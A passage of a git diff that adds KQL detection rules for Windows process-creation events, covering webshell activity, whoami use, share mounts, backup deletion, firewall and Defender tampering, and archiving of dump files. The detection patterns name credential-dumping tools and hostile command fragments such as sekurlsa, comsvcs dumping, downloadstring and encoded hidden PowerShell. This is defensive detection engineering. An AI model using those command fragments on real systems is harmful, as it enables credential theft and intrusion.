"\\wevtutil.exe" or FolderPath endswith "\\whoami.exe") or (ProcessVersionInfoOriginalFileName in~ ("dsquery.exe", "find.exe", "findstr.exe", "ipconfig.exe", "netstat.exe", "nslookup.exe", "pathping.exe", "quser.exe", "schtasks.exe", "sysinfo.exe", "tasklist.exe", "tracert.exe", "ver.exe", "VSSADMIN.EXE", "wevtutil.exe", "whoami.exe"))) or (ProcessCommandLine contains " Test-NetConnection " or ProcessCommandLine contains "dir \\") or ((ProcessCommandLine contains " user " or ProcessCommandLine contains " use " or ProcessCommandLine contains " group ") and (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) or (ProcessCommandLine contains " -n " and ProcessVersionInfoOriginalFileName =~ "ping.exe") or ((ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -EncodedCommand " or ProcessCommandLine contains " -w hidden " or ProcessCommandLine contains " -windowstyle hidden" or ProcessCommandLine contains ".WebClient).Download") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) or (ProcessCommandLine contains " /node:" and ProcessVersionInfoOriginalFileName =~ "wmic.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/webshell_hacking_activity_patterns.kql b/KQL/rules/windows/process_creation/webshell_hacking_activity_patterns.kql
new file mode 100644
index 00000000..cd01bc5b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/webshell_hacking_activity_patterns.kql
@@ -0,0 +1,12 @@
+// Title: Webshell Hacking Activity Patterns
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-17
+// Level: high
+// Description: Detects certain parent child patterns found in cases in which a web shell is used to perform certain credential dumping or exfiltration activities on a compromised system
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.discovery, attack.t1505.003, attack.t1018, attack.t1033, attack.t1087
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (((InitiatingProcessFolderPath contains "-tomcat-" or InitiatingProcessFolderPath contains "\\tomcat") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or ((ProcessCommandLine contains "catalina.jar" or ProcessCommandLine contains "CATALINA_HOME") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or (InitiatingProcessFolderPath endswith "\\caddy.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\ws_tomcatservice.exe")) and ((ProcessCommandLine contains "rundll32" and ProcessCommandLine contains "comsvcs") or (ProcessCommandLine contains " -hp" and ProcessCommandLine contains " a " and ProcessCommandLine contains " -m") or (ProcessCommandLine contains "net" and ProcessCommandLine contains " user " and ProcessCommandLine contains " /add") or (ProcessCommandLine contains "net" and ProcessCommandLine contains " localgroup " and ProcessCommandLine contains " administrators " and ProcessCommandLine contains "/add") or (FolderPath endswith "\\ntdsutil.exe" or FolderPath endswith "\\ldifde.exe" or FolderPath endswith "\\adfind.exe" or FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\Nanodump.exe" or FolderPath endswith "\\vssadmin.exe" or FolderPath endswith "\\fsutil.exe") or (ProcessCommandLine contains " -decode " or ProcessCommandLine contains " -NoP " or ProcessCommandLine contains " -W Hidden " or ProcessCommandLine contains " /decode " or ProcessCommandLine contains " /ticket:" or ProcessCommandLine contains " sekurlsa" or ProcessCommandLine contains ".dmp full" or ProcessCommandLine contains ".downloadfile(" or ProcessCommandLine contains ".downloadstring(" or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "process call create" or ProcessCommandLine contains "reg save " or ProcessCommandLine contains "whoami /priv"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/webshell_tool_reconnaissance_activity.kql b/KQL/rules/windows/process_creation/webshell_tool_reconnaissance_activity.kql
new file mode 100644
index 00000000..1daff42d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/webshell_tool_reconnaissance_activity.kql
@@ -0,0 +1,10 @@
+// Title: Webshell Tool Reconnaissance Activity
+// Author: Cian Heasley, Florian Roth (Nextron Systems)
+// Date: 2020-07-22
+// Level: high
+// Description: Detects processes spawned from web servers (PHP, Tomcat, IIS, etc.) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1505.003
+
+DeviceProcessEvents
+| where (((InitiatingProcessFolderPath contains "-tomcat-" or InitiatingProcessFolderPath contains "\\tomcat") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or ((ProcessCommandLine contains "CATALINA_HOME" or ProcessCommandLine contains "catalina.jar") and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")) or (InitiatingProcessFolderPath endswith "\\caddy.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\ws_tomcatservice.exe")) and (ProcessCommandLine contains "perl --help" or ProcessCommandLine contains "perl -h" or ProcessCommandLine contains "python --help" or ProcessCommandLine contains "python -h" or ProcessCommandLine contains "python3 --help" or ProcessCommandLine contains "python3 -h" or ProcessCommandLine contains "wget --help")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/whoami_as_parameter.kql b/KQL/rules/windows/process_creation/whoami_as_parameter.kql
new file mode 100644
index 00000000..7db1a91e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/whoami_as_parameter.kql
@@ -0,0 +1,10 @@
+// Title: WhoAmI as Parameter
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-11-29
+// Level: high
+// Description: Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1033, car.2016-03-001
+
+DeviceProcessEvents
+| where ProcessCommandLine contains ".exe whoami"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/whoami_exe_execution_anomaly.kql b/KQL/rules/windows/process_creation/whoami_exe_execution_anomaly.kql
new file mode 100644
index 00000000..4f760137
--- /dev/null
+++ b/KQL/rules/windows/process_creation/whoami_exe_execution_anomaly.kql
@@ -0,0 +1,14 @@
+// Title: Whoami.EXE Execution Anomaly
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-08-12
+// Level: medium
+// Description: Detects the execution of whoami.exe with suspicious parent processes.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1033, car.2016-03-001
+// False Positives:
+//   - Admin activity
+//   - Scripts and administrative tools used in the monitored environment
+//   - Monitoring activity
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe") and (not(((InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") or (InitiatingProcessFolderPath in~ ("", "-")) or isnull(InitiatingProcessFolderPath)))) and (not(InitiatingProcessFolderPath endswith ":\\Program Files\\Microsoft Monitoring Agent\\Agent\\MonitoringHost.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/whoami_exe_execution_from_privileged_process.kql b/KQL/rules/windows/process_creation/whoami_exe_execution_from_privileged_process.kql
new file mode 100644
index 00000000..03c0e219
--- /dev/null
+++ b/KQL/rules/windows/process_creation/whoami_exe_execution_from_privileged_process.kql
@@ -0,0 +1,10 @@
+// Title: Whoami.EXE Execution From Privileged Process
+// Author: Florian Roth (Nextron Systems), Teymur Kheirkhabarov
+// Date: 2022-01-28
+// Level: high
+// Description: Detects the execution of "whoami.exe" by privileged accounts that are often abused by threat actors
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.discovery, attack.t1033
+
+DeviceProcessEvents
+| where (ProcessVersionInfoOriginalFileName =~ "whoami.exe" or FolderPath endswith "\\whoami.exe") and (AccountName contains "AUTHORI" or AccountName contains "AUTORI" or AccountName contains "TrustedInstaller")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/whoami_exe_execution_with_output_option.kql b/KQL/rules/windows/process_creation/whoami_exe_execution_with_output_option.kql
new file mode 100644
index 00000000..39356810
--- /dev/null
+++ b/KQL/rules/windows/process_creation/whoami_exe_execution_with_output_option.kql
@@ -0,0 +1,10 @@
+// Title: Whoami.EXE Execution With Output Option
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-28
+// Level: medium
+// Description: Detects the execution of "whoami.exe" with the "/FO" flag to choose CSV as output format or with redirection options to export the results to a file for later use.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1033, car.2016-03-001
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " /FO CSV" or ProcessCommandLine contains " -FO CSV") and (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe")) or ProcessCommandLine =~ "*whoami*>*"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/windows_admin_share_mount_via_net_exe.kql b/KQL/rules/windows/process_creation/windows_admin_share_mount_via_net_exe.kql
new file mode 100644
index 00000000..af97e23b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/windows_admin_share_mount_via_net_exe.kql
@@ -0,0 +1,12 @@
+// Title: Windows Admin Share Mount Via Net.EXE
+// Author: oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga
+// Date: 2020-10-05
+// Level: medium
+// Description: Detects when an admin share is mounted using net.exe
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021.002
+// False Positives:
+//   - Administrators
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " use " and (ProcessCommandLine contains " \\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains "$")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/windows_backup_deleted_via_wbadmin_exe.kql b/KQL/rules/windows/process_creation/windows_backup_deleted_via_wbadmin_exe.kql
new file mode 100644
index 00000000..6c7054e3
--- /dev/null
+++ b/KQL/rules/windows/process_creation/windows_backup_deleted_via_wbadmin_exe.kql
@@ -0,0 +1,14 @@
+// Title: Windows Backup Deleted Via Wbadmin.EXE
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-12-13
+// Level: medium
+// Description: Detects the deletion of backups or system state backups via "wbadmin.exe".
+// This technique is used by numerous ransomware families and actors.
+// This may only be successful on server platforms that have Windows Backup enabled.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+// False Positives:
+//   - Legitimate backup activity from administration scripts and software.
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "delete " and ProcessCommandLine contains "backup") and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")) and (not(ProcessCommandLine contains "keepVersions:0"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/windows_credential_manager_access_via_vaultcmd.kql b/KQL/rules/windows/process_creation/windows_credential_manager_access_via_vaultcmd.kql
new file mode 100644
index 00000000..9c0ad9c7
--- /dev/null
+++ b/KQL/rules/windows/process_creation/windows_credential_manager_access_via_vaultcmd.kql
@@ -0,0 +1,10 @@
+// Title: Windows Credential Manager Access via VaultCmd
+// Author: frack113
+// Date: 2022-04-08
+// Level: medium
+// Description: List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1555.004
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/listcreds:" and (FolderPath endswith "\\VaultCmd.exe" or ProcessVersionInfoOriginalFileName =~ "VAULTCMD.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/windows_default_domain_gpo_modification_via_gpme.kql b/KQL/rules/windows/process_creation/windows_default_domain_gpo_modification_via_gpme.kql
new file mode 100644
index 00000000..d45f7d5a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/windows_default_domain_gpo_modification_via_gpme.kql
@@ -0,0 +1,13 @@
+// Title: Windows Default Domain GPO Modification via GPME
+// Author: TropChaud
+// Date: 2025-11-22
+// Level: medium
+// Description: Detects the use of the Group Policy Management Editor (GPME) to modify Default Domain or Default Domain Controllers Group Policy Objects (GPOs).
+// Adversaries may leverage GPME to make stealthy changes in these default GPOs to deploy malicious GPOs configurations across the domain without raising suspicion.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1484.001
+// False Positives:
+//   - Legitimate use of GPME to modify GPOs
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "31B2F340-016D-11D2-945F-00C04FB984F9" or ProcessCommandLine contains "6AC1786C-016F-11D2-945F-00C04FB984F9") and (ProcessCommandLine contains "gpme.msc" and ProcessCommandLine contains "gpobject:") and (FolderPath endswith "\\mmc.exe" or ProcessVersionInfoOriginalFileName =~ "MMC.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/windows_defender_context_menu_removed.kql b/KQL/rules/windows/process_creation/windows_defender_context_menu_removed.kql
new file mode 100644
index 00000000..62c27b50
--- /dev/null
+++ b/KQL/rules/windows/process_creation/windows_defender_context_menu_removed.kql
@@ -0,0 +1,14 @@
+// Title: Windows Defender Context Menu Removed
+// Author: Matt Anderson (Huntress)
+// Date: 2025-07-09
+// Level: high
+// Description: Detects the use of reg.exe or PowerShell to delete the Windows Defender context menu handler registry keys.
+// This action removes the "Scan with Microsoft Defender" option from the right-click menu for files, directories, and drives.
+// Attackers may use this technique to hinder manual, on-demand scans and reduce the visibility of the security product.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - May be part of a system customization or "debloating" script, but this is highly unusual in a managed corporate environment.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "del" or ProcessCommandLine contains "Remove-Item" or ProcessCommandLine contains "ri ") and ((FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\reg.exe") or (ProcessVersionInfoOriginalFileName in~ ("powershell_ise.EXE", "PowerShell.EXE", "pwsh.dll", "reg.exe"))) and ProcessCommandLine contains "\\shellex\\ContextMenuHandlers\\EPP"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/windows_defender_definition_files_removed.kql b/KQL/rules/windows/process_creation/windows_defender_definition_files_removed.kql
new file mode 100644
index 00000000..50cef6d8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/windows_defender_definition_files_removed.kql
@@ -0,0 +1,10 @@
+// Title: Windows Defender Definition Files Removed
+// Author: frack113
+// Date: 2021-07-07
+// Level: high
+// Description: Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -RemoveDefinitions" and ProcessCommandLine contains " -All") and (FolderPath endswith "\\MpCmdRun.exe" or ProcessVersionInfoOriginalFileName =~ "MpCmdRun.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/windows_firewall_disabled_via_powershell.kql b/KQL/rules/windows/process_creation/windows_firewall_disabled_via_powershell.kql
new file mode 100644
index 00000000..faaedb7c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/windows_firewall_disabled_via_powershell.kql
@@ -0,0 +1,10 @@
+// Title: Windows Firewall Disabled via PowerShell
+// Author: Tim Rauch, Elastic (idea)
+// Date: 2022-09-14
+// Level: medium
+// Description: Detects attempts to disable the Windows Firewall using PowerShell
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Set-NetFirewallProfile " and ProcessCommandLine contains " -Enabled " and ProcessCommandLine contains " False") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\powershell_ise.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains " -All " or ProcessCommandLine contains "Public" or ProcessCommandLine contains "Domain" or ProcessCommandLine contains "Private")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/windows_hotfix_updates_reconnaissance_via_wmic_exe.kql b/KQL/rules/windows/process_creation/windows_hotfix_updates_reconnaissance_via_wmic_exe.kql
new file mode 100644
index 00000000..83ee6204
--- /dev/null
+++ b/KQL/rules/windows/process_creation/windows_hotfix_updates_reconnaissance_via_wmic_exe.kql
@@ -0,0 +1,10 @@
+// Title: Windows Hotfix Updates Reconnaissance Via Wmic.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-20
+// Level: medium
+// Description: Detects the execution of wmic with the "qfe" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " qfe" and (ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/windows_internet_hosted_webdav_share_mount_via_net_exe.kql b/KQL/rules/windows/process_creation/windows_internet_hosted_webdav_share_mount_via_net_exe.kql
new file mode 100644
index 00000000..ee0091cf
--- /dev/null
+++ b/KQL/rules/windows/process_creation/windows_internet_hosted_webdav_share_mount_via_net_exe.kql
@@ -0,0 +1,10 @@
+// Title: Windows Internet Hosted WebDav Share Mount Via Net.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-21
+// Level: high
+// Description: Detects when an internet hosted webdav share is mounted using the "net.exe" utility
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021.002
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " use " and ProcessCommandLine contains " http") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/windows_kernel_debugger_execution.kql b/KQL/rules/windows/process_creation/windows_kernel_debugger_execution.kql
new file mode 100644
index 00000000..6d8929df
--- /dev/null
+++ b/KQL/rules/windows/process_creation/windows_kernel_debugger_execution.kql
@@ -0,0 +1,12 @@
+// Title: Windows Kernel Debugger Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-15
+// Level: medium
+// Description: Detects execution of the Windows Kernel Debugger "kd.exe".
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation
+// False Positives:
+//   - Rare occasions of legitimate cases where kernel debugging is necessary in production. Investigation is required
+
+DeviceProcessEvents
+| where FolderPath endswith "\\kd.exe" or ProcessVersionInfoOriginalFileName =~ "kd.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/windows_msix_package_support_framework_ai_stubs_execution.kql b/KQL/rules/windows/process_creation/windows_msix_package_support_framework_ai_stubs_execution.kql
new file mode 100644
index 00000000..2df2db29
--- /dev/null
+++ b/KQL/rules/windows/process_creation/windows_msix_package_support_framework_ai_stubs_execution.kql
@@ -0,0 +1,13 @@
+// Title: Windows MSIX Package Support Framework AI_STUBS Execution
+// Author: Michael Haag, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-11-03
+// Level: low
+// Description: Detects execution of Advanced Installer MSIX Package Support Framework (PSF) components, specifically AI_STUBS executables with original filename 'popupwrapper.exe'.
+// This activity may indicate malicious MSIX packages build with Advanced Installer leveraging the Package Support Framework to bypass application control restrictions.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218, attack.t1553.005, attack.t1204.002
+// False Positives:
+//   - Legitimate applications packaged with Advanced Installer using Package Support Framework
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\AI_STUBS\\AiStubX64Elevated.exe" or FolderPath endswith "\\AI_STUBS\\AiStubX86Elevated.exe" or FolderPath endswith "\\AI_STUBS\\AiStubX64.exe" or FolderPath endswith "\\AI_STUBS\\AiStubX86.exe") and ProcessVersionInfoOriginalFileName =~ "popupwrapper.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/windows_processes_suspicious_parent_directory.kql b/KQL/rules/windows/process_creation/windows_processes_suspicious_parent_directory.kql
new file mode 100644
index 00000000..dac61897
--- /dev/null
+++ b/KQL/rules/windows/process_creation/windows_processes_suspicious_parent_directory.kql
@@ -0,0 +1,12 @@
+// Title: Windows Processes Suspicious Parent Directory
+// Author: vburov
+// Date: 2019-02-23
+// Level: low
+// Description: Detect suspicious parent processes of well-known Windows processes
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.003, attack.t1036.005
+// False Positives:
+//   - Some security products seem to spawn these
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\taskhost.exe" or FolderPath endswith "\\lsm.exe" or FolderPath endswith "\\lsass.exe" or FolderPath endswith "\\services.exe" or FolderPath endswith "\\lsaiso.exe" or FolderPath endswith "\\csrss.exe" or FolderPath endswith "\\wininit.exe" or FolderPath endswith "\\winlogon.exe") and (not((((InitiatingProcessFolderPath contains "\\Windows Defender\\" or InitiatingProcessFolderPath contains "\\Microsoft Security Client\\") and InitiatingProcessFolderPath endswith "\\MsMpEng.exe") or (isnull(InitiatingProcessFolderPath) or (InitiatingProcessFolderPath in~ ("", "-"))) or ((InitiatingProcessFolderPath endswith "\\SavService.exe" or InitiatingProcessFolderPath endswith "\\ngen.exe") or (InitiatingProcessFolderPath contains "\\System32\\" or InitiatingProcessFolderPath contains "\\SysWOW64\\")))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/windows_recall_feature_enabled_via_reg_exe.kql b/KQL/rules/windows/process_creation/windows_recall_feature_enabled_via_reg_exe.kql
new file mode 100644
index 00000000..72599a22
--- /dev/null
+++ b/KQL/rules/windows/process_creation/windows_recall_feature_enabled_via_reg_exe.kql
@@ -0,0 +1,15 @@
+// Title: Windows Recall Feature Enabled Via Reg.EXE
+// Author: Sajid Nawaz Khan
+// Date: 2024-06-02
+// Level: medium
+// Description: Detects the enabling of the Windows Recall feature via registry manipulation.
+// Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" value, or setting it to 0.
+// Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.
+// This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1113
+// False Positives:
+//   - Legitimate use/activation of Windows Recall
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "Microsoft\\Windows\\WindowsAI" and ProcessCommandLine contains "DisableAIDataAnalysis") and ((ProcessCommandLine contains "add" or ProcessCommandLine contains "0") or ProcessCommandLine contains "delete")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/windows_recovery_environment_disabled_via_reagentc.kql b/KQL/rules/windows/process_creation/windows_recovery_environment_disabled_via_reagentc.kql
new file mode 100644
index 00000000..b6d8a09b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/windows_recovery_environment_disabled_via_reagentc.kql
@@ -0,0 +1,14 @@
+// Title: Windows Recovery Environment Disabled Via Reagentc
+// Author: Daniel Koifman (KoifSec), Michael Vilshin
+// Date: 2025-07-31
+// Level: medium
+// Description: Detects attempts to disable windows recovery environment using Reagentc.
+// ReAgentc.exe is a command-line tool in Windows used to manage the Windows Recovery Environment (WinRE).
+// It allows users to enable, disable, and configure WinRE, which is used for troubleshooting and repairing common boot issues.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+// False Positives:
+//   - Legitimate administrative activity
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-disable" or ProcessCommandLine contains "/disable" or ProcessCommandLine contains "–disable" or ProcessCommandLine contains "—disable" or ProcessCommandLine contains "―disable") and (FolderPath endswith "\\reagentc.exe" or ProcessVersionInfoOriginalFileName =~ "reagentc.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/windows_share_mount_via_net_exe.kql b/KQL/rules/windows/process_creation/windows_share_mount_via_net_exe.kql
new file mode 100644
index 00000000..1baca70e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/windows_share_mount_via_net_exe.kql
@@ -0,0 +1,12 @@
+// Title: Windows Share Mount Via Net.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-02
+// Level: low
+// Description: Detects when a share is mounted using the "net.exe" utility
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021.002
+// False Positives:
+//   - Legitimate activity by administrators and scripts
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " use " or ProcessCommandLine contains " \\\\") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/winrar_compressing_dump_files.kql b/KQL/rules/windows/process_creation/winrar_compressing_dump_files.kql
new file mode 100644
index 00000000..f1601036
--- /dev/null
+++ b/KQL/rules/windows/process_creation/winrar_compressing_dump_files.kql
@@ -0,0 +1,13 @@
+// Title: Winrar Compressing Dump Files
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-04
+// Level: medium
+// Description: Detects execution of WinRAR in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1560.001
+// False Positives:
+//   - Legitimate use of WinRAR with a command line in which ".dmp" or ".dump" appears accidentally
+//   - Legitimate use of WinRAR to compress WER ".dmp" files for troubleshooting
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".dmp" or ProcessCommandLine contains ".dump" or ProcessCommandLine contains ".hdmp") and ((FolderPath endswith "\\rar.exe" or FolderPath endswith "\\winrar.exe") or ProcessVersionInfoFileDescription =~ "Command line RAR")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/winrar_execution_in_non_standard_folder.kql b/KQL/rules/windows/process_creation/winrar_execution_in_non_standard_folder.kql
new file mode 100644
index 00000000..53b9ca49
--- /dev/null
+++ b/KQL/rules/windows/process_creation/winrar_execution_in_non_standard_folder.kql
@@ -0,0 +1,12 @@
+// Title: WinRAR Execution in Non-Standard Folder
+// Author: Florian Roth (Nextron Systems), Tigzy
+// Date: 2021-11-17
+// Level: medium
+// Description: Detects a suspicious WinRAR execution in a folder which is not the default installation folder
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1560.001
+// False Positives:
+//   - Legitimate use of WinRAR in a folder of a software that bundles WinRAR
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\rar.exe" or FolderPath endswith "\\winrar.exe") or (ProcessVersionInfoFileDescription in~ ("Command line RAR", "WinRAR"))) and (not(((FolderPath contains ":\\Program Files (x86)\\WinRAR\\" or FolderPath contains ":\\Program Files\\WinRAR\\") or FolderPath endswith "\\UnRAR.exe"))) and (not(FolderPath contains ":\\Windows\\Temp\\"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/winrs_local_command_execution.kql b/KQL/rules/windows/process_creation/winrs_local_command_execution.kql
new file mode 100644
index 00000000..5db95591
--- /dev/null
+++ b/KQL/rules/windows/process_creation/winrs_local_command_execution.kql
@@ -0,0 +1,13 @@
+// Title: Winrs Local Command Execution
+// Author: Liran Ravich, Nasreddine Bencherchali
+// Date: 2025-10-22
+// Level: high
+// Description: Detects the execution of Winrs.exe where it is used to execute commands locally.
+// Commands executed this way are launched under Winrshost.exe and can represent proxy execution used for defense evasion or lateral movement.
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.defense-evasion, attack.t1021.006, attack.t1218
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\winrs.exe" or ProcessVersionInfoOriginalFileName =~ "winrs.exe") and (ProcessCommandLine contains "-r:localhost" or ProcessCommandLine contains "/r:localhost" or ProcessCommandLine contains "–r:localhost" or ProcessCommandLine contains "—r:localhost" or ProcessCommandLine contains "―r:localhost" or ProcessCommandLine contains "-r:127.0.0.1" or ProcessCommandLine contains "/r:127.0.0.1" or ProcessCommandLine contains "–r:127.0.0.1" or ProcessCommandLine contains "—r:127.0.0.1" or ProcessCommandLine contains "―r:127.0.0.1" or ProcessCommandLine contains "-r:[::1]" or ProcessCommandLine contains "/r:[::1]" or ProcessCommandLine contains "–r:[::1]" or ProcessCommandLine contains "—r:[::1]" or ProcessCommandLine contains "―r:[::1]" or ProcessCommandLine contains "-remote:localhost" or ProcessCommandLine contains "/remote:localhost" or ProcessCommandLine contains "–remote:localhost" or ProcessCommandLine contains "—remote:localhost" or ProcessCommandLine contains "―remote:localhost" or ProcessCommandLine contains "-remote:127.0.0.1" or ProcessCommandLine contains "/remote:127.0.0.1" or ProcessCommandLine contains 